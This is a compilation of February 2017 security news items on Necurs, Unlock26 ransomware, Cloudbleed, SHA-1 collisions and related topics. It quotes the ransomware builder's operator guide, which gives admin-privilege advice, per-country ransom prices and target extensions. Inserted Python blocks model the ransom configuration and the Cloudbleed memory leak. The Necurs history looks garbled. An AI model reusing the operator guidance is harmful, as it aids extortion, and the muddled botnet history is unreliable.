27.2.2017 securityaffairs BotNet

The Necurs botnet is evolving and recently the experts at BitSight’s Anubis Labs discovered that it was improved to launch DDoS attacks.
The Necurs botnet continues to evolve; recently it has been used by crooks not only to spread the dreaded Locky ransomware but has also been improved to launch DDoS attacks.

According to researchers at BitSight’s Anubis Labs, who are monitoring the Necurs botnet, the malware was modified in September to include a module that implements DDoS capabilities and new proxy command-and-control communication features.

The Necurs botnet is one of the world’s largest malicious infrastructures, used to spread dreaded threats, and it vanished on June 1.

When it was first spotted in early 2015, experts classified the malicious infrastructure as highly complex and efficient, “a masterpiece of criminality.”

In October 2015, an international joint effort of law enforcement agencies, including the FBI and the NCA, took down the botnet, but it later resurfaced and was used mainly to spread the Locky ransomware. Experts called it Necurs and confirmed it was the world’s largest botnet.

“Necurs is a modular malware that can be used for many different purposes. What’s new with the sample we found is the addition of a module that adds SOCKS/HTTP proxy and DDoS capabilities to this malware,” explained Tiago Pereira, threat intel researcher with Anubis Labs.

About six months ago, Pereira and his team discovered that besides the usual port 80 communications, a system compromised by the Necurs malware was communicating with a set of IPs through a different port using a different protocol.

The researchers reverse-engineered the malware and discovered what appeared to be a simple SOCKS/HTTP proxy module for communications between the bot and the command-and-control server.


“As we looked at the commands the bot would accept from the C2, we realized that there was an additional command, that would cause the bot to start making HTTP or UDP requests to an arbitrary target in an endless loop, in a way that could only be explained as a DDoS attack,” continues the analysis published by Pereira.

The researchers have no proof that the threat actors in the wild have used the Necurs botnet in DDoS attacks.

“Please notice that we have not seen Necurs being used for DDOS attacks, we simply saw that it has that capability in one of the modules that it has been loading,” Pereira wrote.

The bots were used by operators as proxies (HTTP, SOCKSv4 and SOCKSv5 protocols) relaying connections through them in “direct proxy” and “proxy backconnect” modes.

“As a response to the beacon, there are also three types of messages (or commands) sent by the C2 to the bot, that can be distinguished by the msgtype byte in the header:”

Start Proxybackconnect (msgtype 1);
Sleep (msgtype 2);
Start DDOS (msgtype 5) that includes HTTPFlood and UDPFlood modes.
The researcher highlighted that a malicious infrastructure the size of the Necurs botnet could be very dangerous because it could generate a huge volume of traffic.

“The HTTP attack works by starting 16 threads that perform an endless loop of HTTP requests… The UDP flood attack works by repeatedly sending a random payload with size between 128 and 1024 bytes,” reads the report.


New Unlock26 Ransomware and RaaS Portal Discovered

27.2.2017 securityweek Virus

A recently discovered Ransomware-as-a-Service (RaaS) portal was found to be responsible for the distribution of a brand new ransomware family dubbed Unlock26.

Dubbed Dot-Ransomware, the RaaS portal went live on February 19, and security researchers suggest that the Unlock26 ransomware was released the same day. Further, they reveal that the ransomware operation features a very minimal and direct style, with few instructions and simple ransom notes and payment portal.

Wannabe criminals registering for the service get to download two files: a benign ransomware payload dubbed core.exe, and an archive called builder.zip containing the builder and usage instructions.

The builder, BleepingComputer reports, is a minimal command-line interface through which affiliates can customize the ransom amount (can even set special decryption prices per country), the targeted file types, the type of encryption (full or first 4MB of each file), and the Bitcoin address where the payment should be sent.

To apply the custom settings to the ransomware, affiliates only need to load the core.exe file in the builder, which will also generate a fully weaponized binary, ready for distribution. From this point onward, it’s up to each affiliate to distribute the malicious file using whatever means necessary.

Dubbed Unlock26, the newly-generated ransomware appends a .locked-[XXX] extension to the encrypted files, where XXX appear to be three random alpha-numeric characters unique for each victim. Once the encryption process has been completed, the malware displays a ransom note that instructs victims to access one of four Tor-to-Web proxy URLs.

A signature hidden in the links displayed by the ransom note allows cybercriminals to distinguish between infected hosts, researchers say. However, this also means that victims have to click on the links, and that typing the visible URLs manually in a browser won't offer access to the payment portal, because the site checks for the presence of those signatures.

The signatures are believed to have been included so that each user would be pointed to a unique Bitcoin address when accessing the portal. The payment site, however, doesn’t provide clear instructions on what victims should do, most probably because the malware authors expect victims to have knowledge of what being infected with ransomware involves.

On the other hand, both the ransom note and the payment site fail to tell victims how much they have to pay; on the payment site, a math expression is listed instead: 6.e-002 BTC. Because of all this, and because the builder contains an error, researchers suggest that both the ransomware and the RaaS operation are under development, not yet ready to be deployed.


Google Hands Over Email Encryption App to Community

27.2.2017 securityweek Krypto

Google announced last week that it has decided to hand over its E2EMail email encryption app to the community.

The tech giant first announced its End-to-End email encryption project in June 2014 and released its source code a few months later. The goal was to create a Chrome extension that would make it easier for less tech savvy people to encrypt their emails using the OpenPGP standard.

The End-to-End crypto library has been used for several projects, including E2EMail, a Gmail client that runs independently of the normal Gmail interface and allows users to send and receive encrypted emails.

The E2EMail source code has been available on GitHub for the past year and it has received contributions from several security engineers. The search giant has now announced that E2EMail is not a Google product and instead it has become a “fully community-driven open source project.”

Since so much time has passed and a Chrome extension is still not ready for general use, some believe this may actually be Google’s way of saying that it has abandoned the project, especially since no changes have been made to the code in the past months.

On the other hand, Google did say that it is looking forward to working “alongside the community” to integrate E2EMail with other projects, such as the recently announced Key Transparency.

“E2EMail in its current incarnation uses a bare-bones central keyserver for testing, but the recent Key Transparency announcement is crucial to its further evolution,” Google employees said in a blog post. “Key discovery and distribution lie at the heart of the usability challenges that OpenPGP implementations have faced. Key Transparency delivers a solid, scalable, and thus practical solution, replacing the problematic web-of-trust model traditionally used with PGP.”


New RaaS Portal Preparing to Spread Unlock26 Ransomware

27.2.2017 securityweek bleepingcomputer.com Virus
A new Ransomware-as-a-Service (RaaS) portal named Dot-Ransomware is behind the Unlock26 ransomware discovered this past week.

First spotted two days ago, this ransomware operation is unusual in its very minimal and direct style, with little to no instructions and plainly designed ransom notes and ransom payment portal.

Based on two messages left on the Dot-Ransomware homepage, this entire operation launched on Sunday, February 19, when the website was set up.

Image: Dot-Ransomware website

Anyone who registers on the service can download two files. One is core.exe, the bare, not yet configured ransomware payload; the second is builder.zip, an archive containing the builder and its usage instructions (embedded in full at the end of the article).

The builder is a minimal CLI tool that allows users to customize the following options:

Ransomware decryption price
Special decryption prices per country
Extensions targeted for encryption
The type of encryption (full or first 4MB of each file)
The Bitcoin address to which the RaaS user's 50% cut is sent
Image: Dot-Ransomware builder

According to the builder's instructions file, users must load the core.exe file in the builder, which will then patch the file with the user's custom settings, and generate a fully weaponized binary, ready for distribution.

How each Dot-Ransomware user spreads this file is up to them: malvertising, spam, or manual infection after brute-forcing RDP connections.

Unlock26 infection process
On the victim's side, the newly-generated Unlock26 ransomware will encrypt the user's files based on the internal configuration file, and append each locked file with a .locked-[XXX] extension, where XXX appear to be three random alpha-numeric characters unique for each victim.

Files locked by Unlock26

The last step in the infection process is to show the ransom note, which is simple and to the point, urging users to visit one of four Tor-to-Web proxy URLs.

The ransomware's name comes from the first eight characters of its payment site's hostname, unlock26ozqwoyfv; researchers coined it before they discovered the Dot-Ransomware RaaS and linked the ransomware to it.

Unlock26 ransom note

The links in the Unlock26 ransom note also hide a signature that allows crooks to distinguish between infected hosts.

Unlock26 signature

This means you have to click on the links from the ransom note itself. Typing the visible URLs manually in a browser won't let you access the payment site, which checks for the presence of these signatures. We suspect the signatures are most likely used to display unique Bitcoin addresses for each user accessing the payment site.

Unlock26 signature in URL

Accessing the Unlock26 payment site we find the same simplistic style, lacking any kind of meaningful instructions.

From our analysis of this entire operation, it's like the ransomware author is expecting everyone to know what to do, as if everyone gets infected with ransomware on a daily basis, and all users are tech-savvy PC veterans that know exactly what should happen next.

Image: Unlock26 ransom payment site

Dot-Ransomware, Unlock26 appear to be under development
But user instructions are not the only things missing from Dot-Ransomware and Unlock26.

For example, if victims wanted to pay, they would struggle to work out how much Bitcoin to send: the Unlock26 payment site does not print the decryption price as a plain figure but in scientific notation, 6.e-002 BTC, i.e. 0.06 BTC. That is odd, to say the least, unless you really do not want people to pay the ransom.

Putting this detail together with the error seen in one section of the builder (screenshot above) and with the fact that no users have reported Unlock26 infections so far, we can safely say that this ransomware and its RaaS are still under development and not yet ready to be deployed. Let's hope its author gets bored in a few days and drops the service entirely, but we doubt that will happen after so much work to reach this advanced stage of development.

Special thanks to MalwareHunter, who discovered the Unlock26 ransomware, David Montenegro, who discovered the Dot-Ransomware RaaS, Bleeping Computer's Lawrence Abrams and GrujaRS, who helped with the analysis and info gathering.

IOCs
core.exe SHA256 hash:
db43d7c41da0223ada39d4f9e883611e733652194c347c78efcc439fde6dde1c

builder.zip SHA256 hash:
dd03307aa51cfb1c5a3c3fafc65729ad5b50a764354ef3919b7f9d0b4c6142a5

Ransom note:
Your data was locked!

To unlock your data follow the instructions below
Go to one of this sites

unlock26ozqwoyfv.onion.to
unlock26ozqwoyfv.onion.nu
unlock26ozqwoyfv.onion.casa
unlock26ozqwoyfv.hiddenservice.net

Builder 'Setup Guide.txt' file
================================================================================

====================================================
DotRansomware Setup Guide
====================================================

================================================================================

Attention!!!
We recommend you to build your ransomware inside virtual machine!
(But it is safe to use builder on your PC, just don't run builded exe file on your PC!)

================================================================================

Recommendation:
If you have got possibility to run ransomware on victim's computer with
administrator privileges then do it. Because it will provide better conversion.

================================================================================

Recommended decryption price:
0.1

================================================================================

Recommended special decryption prices:
FR|0.15|FI|0.15|IE|0.15|IS|0.15|AU|0.15|BE|0.15|CA|0.15|AT|0.15|DK|0.15|SE|0.15|DE|0.15|NL|0.15|SA|0.2|US|0.2|HK|0.2|LU|0.2|CH|0.2|NO|0.2|AE|0.2|SG|0.2|KW|0.2|MO|0.2|QA|0.2

================================================================================

Recommended attacked extensions:
001|1dc|3ds|3fr|7z|a3s|acb|acbl|accdb|act|ai|ai3|ai4|ai5|ai6|ai7|ai8|aia|aif|aiff|aip|ait|anim|apk|arch00|ari|art|arw|
asc|ase|asef|asp|aspx|asset|avi|bar|bak|bay|bc6|bc7|bgeo|big|bik|bkf|bkp|blob|bmp|bsa|c|c4d|cap|cas|catpart|catproduct|
cdr|cef|cer|cfr|cgm|cha|chr|cld|clx|cpp|cr2|crt|crw|cs|css|csv|cxx|d3dbsp|das|dayzprofile|dazip|db|db0|dbf|
dbfv|dcr|dcs|der|desc|dib|dlc|dle|dlv|dlv3|dlv4|dmp|dng|doc|docm|docx|drf|dvi|dvr|dwf|dwg|dxf|dxg|eip|emf|emz|
epf|epk|eps|eps2|eps3|epsf|epsp|erf|esm|fbx|ff|fff|fh10|fh11|fh7|fh8|fh9|fig|flt|flv|fmod|forge|fos|fpk|fsh|ft8|fxg|gdb|
ge2|geo|gho|h|hip|hipnc|hkdb|hkx|hplg|hpp|hvpl|hxx|iam|ibank|icb|icxs|idea|iff|iiq|indd|ipt|iros|irs|itdb|itl|itm|iwd|iwi|j2k|
java|jp2|jpe|jpeg|jpf|jpg|jpx|js|k25|kdb|kdc|kf|kys|layout|lbf|lex|litemod|lrf|ltx|lvl|m|m2|m2t|m2ts|m3u|m4a|m4v|ma|map|
mat|mb|mcfi|mcfp|mcgame|mcmeta|mdb|mdbackup|mdc|mddata|mdf|mdl|mdlp|mef|mel|menu|mkv|mll|mlx|mn|model|mos|mp|
mp4|mpqge|mrw|mrwref|mts|mu|mxf|nb|ncf|nef|nrw|ntl|obm|ocdc|odb|odc|odm|odp|ods|odt|omeg|orf|ott|p12|p7b|p7c|
pak|pct|pcx|pdd|pdf|pef|pem|pfx|php|php4|php5|pic|picnc|pkpass|png|ppd|ppt|pptm|pptx|prj|prt|prtl|ps|psb|psd|psf|psid|
psk|psq|pst|ptl|ptx|pwl|pxn|pxr|py|qdf|qic|r3d|raa|raf|rar|raw|rb|re4|rgss3a|rim|rofl|rtf|rtg|rvt|rw2|rwl|rwz|sav|sb|sbx|
sc2save|shp|sid|sidd|sidn|sie|sis|skl|skp|sldasm|sldprt|slm|slx|slxp|snx|soft|sqlite|sqlite3|sr2|srf|srw|step|stl|stp|sum|svg|
svgz|swatch|syncdb|t12|t13|tax|tex|tga|tif|tiff|tor|txt|unity3d|uof|uos|upk|vda|vdf|vfl|vfs0|vpk|vpp_pc|vst|vtf|w3x|wb2|
wdx|wma|wmo|wmv|wallet|ycbcra|wotreplay|wpd|wps|x3f|xf|xl|xlk|xls|xlsb|xlsm|xlsx|xvc|xvz|xxx|zdct|zip|ztmp|py|rb|
tar|gz|sdf|yuv|max|wav|dat

================================================================================

Recommendation:
You need to test builded exe file inside virtual machine, because operability can be broken after crypt/pack of core!

================================================================================

Links to website:
dot2cgpiwzpmwtuh.onion.to
dot2cgpiwzpmwtuh.onion.nu
dot2cgpiwzpmwtuh.hiddenservice.net
dot2cgpiwzpmwtuh.onion.casa
dot2cgpiwzpmwtuh.onion
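The builder options listed earlier, the .locked-[XXX] naming described in the infection process section and the "A|B|C" lists in the Setup Guide above can all be turned into a small triage helper. The following Python is an added example written for this page, not code from the Dot-Ransomware builder or from the researchers: it parses the guide's country-price table and extension list (shortened, constructed excerpts here), normalises the payment site's "6.e-002 BTC" figure, tells which files on a share the configured payload would have encrypted, and counts distinct victim IDs from .locked-XXX file names. The file paths and the shortened lists are constructed sample input.

```python
import re
from pathlib import PurePosixPath

# Constructed excerpts in the builder's own "A|B|C" format (the full
# recommended lists are in the Setup Guide above); shortened for readability.
SPECIAL_PRICES = "FR|0.15|FI|0.15|DE|0.15|US|0.2|CH|0.2|SG|0.2"
ATTACKED_EXTENSIONS = "7z|docx|jpg|pdf|py|rb|xlsx|zip|py|rb"   # the guide repeats py and rb
DEFAULT_PRICE = "0.1"

# Per-victim marker the article describes: name.ext.locked-XXX, XXX alphanumeric.
LOCKED_RE = re.compile(r"\.locked-([0-9A-Za-z]{3})$")


def parse_special_prices(spec):
    """'CC|price|CC|price|...' -> {'FR': 0.15, ...}.  Line breaks (the guide
    wraps the table) are dropped first.  An odd number of fields means a
    country without a price and is rejected instead of silently pairing
    the wrong columns."""
    fields = [f for f in spec.replace("\n", "").split("|") if f]
    if len(fields) % 2:
        raise ValueError("unpaired country/price field in %r" % spec)
    return {cc.upper(): float(price) for cc, price in zip(fields[::2], fields[1::2])}


def parse_extensions(spec):
    """'ext|ext|...' -> lower-case set; duplicates collapse."""
    return {e.strip().lower() for e in spec.split("|") if e.strip()}


def btc_amount(text):
    """Normalise a price string such as the payment site's '6.e-002 BTC'
    (scientific notation for 0.06 BTC) to a float."""
    return float(text.upper().replace("BTC", "").strip())


def ransom_for(country, table, default=DEFAULT_PRICE):
    """Price a victim in `country` would be asked for, honouring the
    per-country override and falling back to the builder's base price."""
    return table.get(country.upper(), float(default))


def would_be_targeted(path, extensions):
    """True if the file's extension is on the builder's attacked list."""
    return PurePosixPath(path).suffix.lstrip(".").lower() in extensions


def victim_ids(paths):
    """Distinct three-character victim IDs seen in .locked-XXX names; tells
    how many separately infected hosts wrote into one share."""
    return {m.group(1) for m in map(LOCKED_RE.search, paths) if m}


if __name__ == "__main__":
    table = parse_special_prices(SPECIAL_PRICES)
    exts = parse_extensions(ATTACKED_EXTENSIONS)
    print("US victim pays", ransom_for("us", table), "BTC; CZ pays", ransom_for("cz", table))
    print("payment site figure:", btc_amount("6.e-002 BTC"), "BTC")
    print("report.PDF targeted:", would_be_targeted("/srv/docs/report.PDF", exts))
    print("victims on share:", victim_ids(["a.docx.locked-9F2", "b.jpg.locked-Q71", "c.txt"]))
```

Feed `parse_special_prices` the full "Recommended special decryption prices" block from the guide and `parse_extensions` the full extension list to get the real targeting profile; the victim-ID set is useful when one file server holds files from several infected workstations.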


Stolen EHR data is flooding criminal underground communities in the Deep Web
27.2.2017 securityaffairs Crime

EHR data are a prized commodity in the cybercriminal underground because of the healthcare industry's poor security.
Electronic health record databases are becoming some of the most prized commodities in the cybercriminal underground.

The healthcare sector has been the industry with the highest number of data breaches in 2015 when a total of 113.2 million healthcare-related records were stolen by hackers.

Huge lots of electronic health record (EHR), medical insurance identification archives, medical profiles represent a lucrative business for crooks.
An electronic health record (EHR) is a digital version of a patient’s medical record.
A report recently published by TrendMicro TrendLabs states that a complete EHR database could be sold as much as $500,000 on the Deep Web.
It is quite easy to find also smaller caches of farmed medical identities, personal medical profiles, and medical insurance ID card information in the principal black markets in the dark web.
Cybercriminals are exploiting the lax security of EHR systems.

“Given the contents of an EHR and its capacity to hold financial and credit card records, healthcare organizations become targets of cybercriminals who aim to steal personal identifiable information (PII), as well as financial information.” reads the report titled “Cybercrime and Other Threats Faced by the Healthcare Industry” “But unlike other data breaches, cybercriminals have found more ways to use information from EHRs aside from selling the data in bulk in underground markets”

The researchers have analyzed the offer on the Deep Web in the attempt to profile the offer and understand pricing models used by the criminals focused on the sale of EHR data.

Looking at EHR data, medical insurance IDs with valid prescriptions go for US$0.50, while complete profiles of US citizens including medical and health insurance data were selling for under US$1.

As noted, EHR data are a profitable business for cybercriminals: fraudulent tax returns based on stolen medical records go for US$13.50, and fake birth certificates based on data stolen from medical records were selling for US$500.

“In the last two years the number of cybercriminals committing tax fraud, through the use of stolen personal data found in EHRs, increased. As a result, Turbo Tax–a program used for filing taxes in the U.S.–had to temporarily suspend state tax filings to investigate the increasing number of fraud cases. ” continues the report.

Identity theft is one of the main fraudulent activities conducted by cybercriminals, who can use EHR data to authenticate themselves against multiple web services.

“In terms of resolving fraud issues, credit cards breaches have financial liability limited to US$50 per card. In the health industry, however, 65% of victims of medical identity theft had to pay an average of US$13,500 to resolve the crime–with costs covering the services of creditors and legal counsel.” reads the report. “Credit cards can be easily canceled and replaced but health care data such as Social Security numbers, and birthdates, are permanent–which means the data will live forever and that cyber criminals may reuse such information for a variety of purposes”

Crooks can use data stolen from medical records to obtain and sell copies of real birth certificates. In the following figure is reported an advertisement for birth certificates published on AlphaBay starting at US$500 per person.

EHR data

The situation is worrying: healthcare organizations are failing to protect their key assets.

It is quite easy for hackers to find poorly secured EHR systems exposed online; search engines like Shodan can provide detailed information on these systems, on healthcare facilities and on medical equipment.

The TrendLabs report detailed research conducted through Shodan that demonstrated the existence of many systems managing EHR data that were left open to the Internet with poor security.

Enjoy the report.


If accounts had no administrator rights, 93% of the vulnerabilities found in Windows 10 could not be exploited successfully

27.2.2017 cnews.cz Vulnerabilities
Vulnerabilities were, are and will be. Security would nevertheless benefit greatly if we did not use user accounts with unnecessarily high privileges. For the vulnerabilities found in Windows last year at least, administrator rights really are what makes them bite.

Using administrator rights has always been criticised in cases where the user does not actually need them. If an account with elevated rights is compromised, the attack can wreak havoc on the computer. History has shown, however, that the concept of privileges is apparently too complicated. In reality most people do not care what rights they have, or rather they grumble when they feel the limitations of an account without administrator rights.

High privileges mean susceptibility to successful attacks

That security would benefit if elevated privileges were not used needlessly often is confirmed by the security firm Avecto. In its research it analysed the security bulletins that Microsoft published in 2016. 530 vulnerabilities were reported in the Redmond giant's products, 36% of them rated critical. I consider it a very important finding that a large part of these holes need not have been a problem at all.

For 94% of all critical vulnerabilities, a successful attack could have been prevented if the user account did not have administrator rights. According to the firm, the figure for critical holes was 85% the year before. (Note what "prevented" means here: the bug is still present, but exploitation from a standard account would be contained rather than hand the attacker the whole machine.) All the more reason to recommend not using accounts with elevated privileges unless absolutely necessary, because doing so significantly raises the chance of a successful attack on our computers. It would also be good to know how administrator rights affect the non-critical vulnerabilities with lower severity ratings. Unfortunately Avecto did not say.

Image: If possible, use a standard account type
Edge and Windows 10

Perhaps even more interesting is the finding that 100% of all vulnerabilities discovered in Edge or Internet Explorer, i.e. not just the critical ones, require administrator rights for a successful attack. Standard accounts thus could not have been attacked through those browsers in a single case last year.

Specifically, 395 vulnerabilities were reported in Windows 10 over the whole year, which the report puts at 46% more than in Windows 8 and 8.1 (both versions of Windows 8 contained 265 holes; 395 against 265 is in fact about 49% more). That makes sense: Windows 8 is older and better debugged, several versions of Windows 10 are on the market at the same time, and given its constant development the number of vulnerabilities discovered in Windows 10 will simply always be higher than in code that has been stable for years.

Image: Last year's attacks on Edge would not have been devastating if standard accounts had been used
More important is how the company deals with the holes. What interests us more right now, though, is a finding that mirrors the two results above. For 93% of the vulnerabilities found in Windows 10, an attack through them would not have succeeded if user accounts did not have administrator rights. Once again administrator rights prove to be a ball and chain, at least from the perspective of security experts.

Avecto also looked at Office, but gave only basic statistics. 79 vulnerabilities were reported in the Office family last year; the year before it was 62, and compared with 2014 that is a 295% increase. Again I assume this is due to the dynamic development of Office as delivered through the Office 365 subscription. We do not know, however, how many of the holes depend on accounts with administrator rights.


Cloudbleed: a data leak from a shared proxy server
27.2.2017 Root.cz Vulnerabilities

Cloudflare has announced a bug in its infrastructure whose consequences are very similar to the Heartbleed vulnerability in OpenSSL. Thanks to a detailed incident report we can read exactly what happened.
It all started inconspicuously on the afternoon of Friday 17 February, when Google security researcher Tavis Ormandy posted a tweet that foreshadowed something big.

While analysing the results of fuzzing, i.e. testing code with a large set of different inputs, he came across strange web content that evidently contained chunks of memory the proxy had never written for that response: stale data left over from earlier requests. It soon turned out that the problem lay in the proxy servers of the Cloudflare service. Once he had managed to isolate and reproduce it, he tried to hand it over to Cloudflare's security team as quickly as possible.

Image: sample of leaked data posted by Tavis Ormandy, data from the well-known Uber app
First aid
Cloudflare's security team immediately understood that this was a serious situation. The first thing it did was switch off the add-on features that were most likely causing the problem, specifically e-mail address obfuscation, Server-Side Excludes and the automatic rewriting of links from http to https. According to the incident report, incident response teams were also assembled immediately, one in San Francisco and one in London, so that they could alternate in 12-hour shifts around the clock. E-mail obfuscation, which caused the most leaks, was switched off 47 minutes after the report; all of the features causing the leak were completely switched off 7 hours after the report.

Finding the cause
From the beginning it was clear that the bug was in the functions that modify the HTML of pages on the fly in the proxy servers. For this purpose Cloudflare had long used its own parser written in the Ragel language. Some time ago, however, they concluded that this code was too complex and hard to maintain, and so they started developing a new one, cf-html. Both parsers are implemented as modules for the NGINX web server, and during the transition period both are active.

Further investigation showed that the bug had been present in the old code for many years, but only the combination with the new module was able to trigger it. The direct cause was an insufficient check for the pointer running past the end of the string in the code generated by the Ragel compiler:

/* generated code */
if ( ++p == pe )
    goto _test_eof;
It should be stressed that this is not a bug in the Ragel compiler but a bug in the source code written in that language, whose author is Cloudflare.

The condition in the code above checks only for equality with the end sentinel. If for whatever reason the pointer skips past the sentinel, the end of the input is not detected and the program reads from the memory immediately following the buffer. That memory may hold various data from previous communications. Because Cloudflare's infrastructure is shared between different customers, it is possible to obtain data from websites other than those affected by the problem. The principle of reading across the bounds of allocated memory is very similar to the Heartbleed bug of 2014.

Image: sample of leaked data posted by Tavis Ormandy, data from a Fitbit fitness tracker
A dormant vulnerability
The out-of-bounds read had most likely been present in the code from the very beginning. It was triggered by a parser error at the very end of the last buffer, for example when the HTML on the origin server ended with an unterminated tag like this one:

<script type=
The bug could not manifest, however, as long as this module worked in NGINX on its own, which is down to the way NGINX hands data to the module. Only once the new cf-html was added alongside the original module were the conditions met for the bug in the old code to start doing harm.
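The two paragraphs above describe the mechanism: an equality-only end check, a pointer that jumps over the sentinel on an unterminated `<script type=`, and a buffer that sits in memory shared with other tenants' traffic. The following Python is an illustrative model added for this page, not Cloudflare's parser or Ragel output: a scanner walks a constructed memory arena holding one customer's HTML immediately followed by stale bytes from another customer's request, with pointer `p` and end sentinel `pe` as in the generated code. The "consume two bytes at once" step is an assumption standing in for whatever parser state moved `p` past `pe`; the cookie value and memory layout are constructed sample data.

```python
import re

# Constructed layout of one shared memory arena (not real Cloudflare data):
# the HTML of customer A currently being rewritten, immediately followed by
# stale bytes left behind by an earlier request from customer B.
CUSTOMER_A_HTML = b"<html><body>hello</body><script type="
STALE_FROM_B = b"GET /api HTTP/1.1\r\nCookie: session=b-secret-7f3a\r\n"
SHARED = bytearray(CUSTOMER_A_HTML + STALE_FROM_B)

TRIGGER = b"<script type="


def rewrite(mem, start, end, strict_check):
    """Copy mem[start:end] to the output, modelling the generated scan loop.

    When the buffer ends in an unterminated '<script type=' the modelled
    parser state consumes two bytes at once (assumption), so p lands one
    past pe.  strict_check=True uses the safe 'p >= pe' test; False keeps
    the '++p == pe' equality test quoted above, which such a skip defeats.
    """
    out = bytearray()
    p, pe = start, end
    while p < len(mem):                 # a real process would keep reading past this arena
        if mem[p] == ord("=") and mem[start:p + 1].endswith(TRIGGER):
            p += 2                      # the skip: p is now pe + 1
        else:
            out.append(mem[p])
            p += 1
        if strict_check:
            if p >= pe:
                break
        elif p == pe:                   # never true once p has jumped over pe
            break
    return bytes(out)


def leaked_cookies(output):
    """What a reader (or a search-engine crawler) of the rewritten page
    would see from the other tenant."""
    return re.findall(rb"Cookie: ([^\r\n]+)", output)


if __name__ == "__main__":
    buggy = rewrite(SHARED, 0, len(CUSTOMER_A_HTML), strict_check=False)
    fixed = rewrite(SHARED, 0, len(CUSTOMER_A_HTML), strict_check=True)
    print("equality check :", buggy)
    print(">= check       :", fixed)
    print("leaked         :", leaked_cookies(buggy))
```

With the equality check the output carries customer B's session cookie; with `p >= pe` the scan stops at the buffer end and the unterminated tag is simply truncated. A well-formed page never takes the skip path, which is why the bug stayed dormant until pages ending in a broken tag met a module combination that produced the jump.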

cf-html was first deployed on 22 September 2016, when the automatic http-to-https link rewriting feature was migrated to it. Customers who had this feature enabled and whose HTML met the invalid-termination condition could have been causing data leaks ever since. According to Cloudflare, however, this feature is not widely used.

The next cf-html deployment was the Server-Side Excludes feature, migrated on 30 January 2017. That feature is activated only for IP addresses with a poor reputation and serves to filter potentially sensitive content; it does not come into play for normal traffic. The greatest effect therefore came from the latest migration in the series, on 13 February, just a few days before the incident was discovered: the migration of e-mail address obfuscation, a feature that is, by contrast, used very frequently.

Identifying the damage
Cloudflare runs separate NGINX web server instances for the different stages of web content processing. The process containing the bug is part of HTML processing and is completely separate from the processes for TLS termination, image recompression and caching. It is therefore certain that the private keys of customer certificates could not have been compromised through this vulnerability. The keys with which Cloudflare encrypts communication between individual servers within a data centre could have been disclosed, however. That encryption was introduced in response to Edward Snowden's revelations about mass surveillance.

The biggest problem, though, is the leak of fragments of the HTTP traffic of other customers who used the same proxy server. Such traffic may contain user names and passwords, or at the very least session cookies, which can be abused to take over other people's identities.

Contaminated caches
Another fundamental problem is that, unlike with Heartbleed, no sophisticated activity was needed to trigger the leak; simply downloading web pages was enough. That is without doubt the most common Internet activity of all, and besides end users it is performed automatically by all kinds of bots.

The leaked data therefore turned up in the caches of all sorts of search engines and web archives. Cloudflare negotiated with several search engines to remove such data, but we can only guess whether all of it was found and whether some is not still lying around somewhere. It is quite likely that some leaks can also be found in the local caches of web browsers on computers and phones around the world.

Leaked data for sale
The vulnerability was disclosed only after a new version of the HTML parsers with the bug fixed had been deployed, on the evening of Tuesday 21 February, and all the leaks found had been removed from search results. Besides the already mentioned post-mortem on the Cloudflare blog, the ticket in which Tavis Ormandy documented the course of the fix, including samples of the leaks, was also made public. Cloudflare also sent a mass e-mail to all customers pointing out that only about 150 customers were affected, but recommending that all long-lived secrets, such as session cookies, be invalidated and replaced.

The figure of 150 customers looks like a serious underestimate, because it is only the number of unique domain names in which leaked information was found through search engines. It is not clear whether the security experts managed to identify whom the leaked data itself belonged to. Anyone who runs a web server behind a Cloudflare proxy should therefore at least revoke all stored sessions, and ideally also ask users to change their passwords as a precaution. Indeed, it was not long before the dark web began offering files of leaked data for sale. It is hard to say whether that is a genuine leak or a simple scam riding on the current news.

Google's invalidated logins are unrelated
Coincidentally, last week Google invalidated the stored logins of a large share of its users. It looks connected, but it does not quite make sense: Google services certainly do not use Cloudflare, so it is unlikely that the cookies used to authenticate to Google were in any danger. Asked directly, Tavis Ormandy replied that the incidents have nothing in common, and the Google forum carries only a notice that some users were logged out during routine maintenance. So it most likely really is a mere coincidence.

Maximum openness to minimise the damage
What is most interesting about the whole event is the way Cloudflare informed about the problem. Although it is a commercial company and the bug appeared in proprietary software that is part of its know-how, the amount of information goes far beyond the usual terse statement along the lines of: "A bug occurred in our systems, we have already fixed it, please change your password."

Also surprising is the speed with which the company was able to stop the leaks (even at the cost of restricting services) and how quickly the fix was rolled out. It is only a pity that the report most likely underestimates the number of victims. And in the pile of detailed technical information, the short and simple guidance for customers on what to do with their service behind Cloudflare to minimise the impact of any leaks gets lost.


Apache Subversion System Affected by SHA-1 Collision

27.2.2017 securityweek Crypto

The successful SHA-1 collision attack announced last week by Google and CWI appears to have a serious impact on repositories that use the Apache Subversion (SVN) software versioning and revision control system.

Developers of the WebKit web browser engine noticed severe problems after attempting to add a test for the SHA-1 collision to their project: uploading the example collision PDF files provided by Google corrupted their SVN repository and prevented further commits.

Google has posted an update to the SHAttered website to warn SVN users of the risks, and Apache Subversion developers have created a tool designed to prevent PDF files such as the ones provided by Google from being committed.

The search giant has so far only published two PDF documents that prove SHA-1 collisions are possible (i.e. the files have the same SHA-1 hash, but different content). However, after 90 days, the company will release the code that allows anyone to create such PDFs.

Finding SHA-1 collisions still requires significant resources – it would cost an attacker at least $110,000 worth of computing power via Amazon’s cloud services – but it’s still 100,000 times faster compared to a brute-force attack.

The SHAttered attack also impacts the Git distributed version control system, which relies on SHA-1 for identifying and checking the integrity of file objects and commits.

However, “the sky isn’t falling,” according to Linux kernel creator Linus Torvalds. Torvalds pointed out that there is a big difference between using SHA-1 for security and using it for generating identifiers for systems such as Git.

Nevertheless, steps have already been taken to mitigate these types of attacks, and Torvalds says Git will eventually transition to a more secure cryptographic hash function.

“There's a plan, it doesn't look all that nasty, and you don't even have to convert your repository,” Torvalds said in a post on Google+. “There's a lot of details to this, and it will take time, but because of the issues above, it's not like this is a critical ‘it has to happen now thing’.”

In addition to version control systems, collision attacks pose a serious threat to digital certificates, email signatures, software updates, vendor signatures, backup systems and ISO checksums. Major vendors have already started moving away from SHA-1, including Google, Facebook, Microsoft and Mozilla.


Google Discloses Unpatched Flaw in Edge, Internet Explorer

27.2.2017 securityweek Vulnerability
Google Project Zero has disclosed a potentially serious vulnerability in Microsoft’s Edge and Internet Explorer web browsers before the tech giant could release patches.

The details of the flaw and proof-of-concept (PoC) code were made public last week by Google Project Zero researcher Ivan Fratric after Microsoft failed to meet the 90-day disclosure deadline.

The security hole, tracked as CVE-2017-0037, has been described as a high severity type confusion. The vulnerability can be exploited to cause the web browsers to crash, but arbitrary code execution could also be possible.

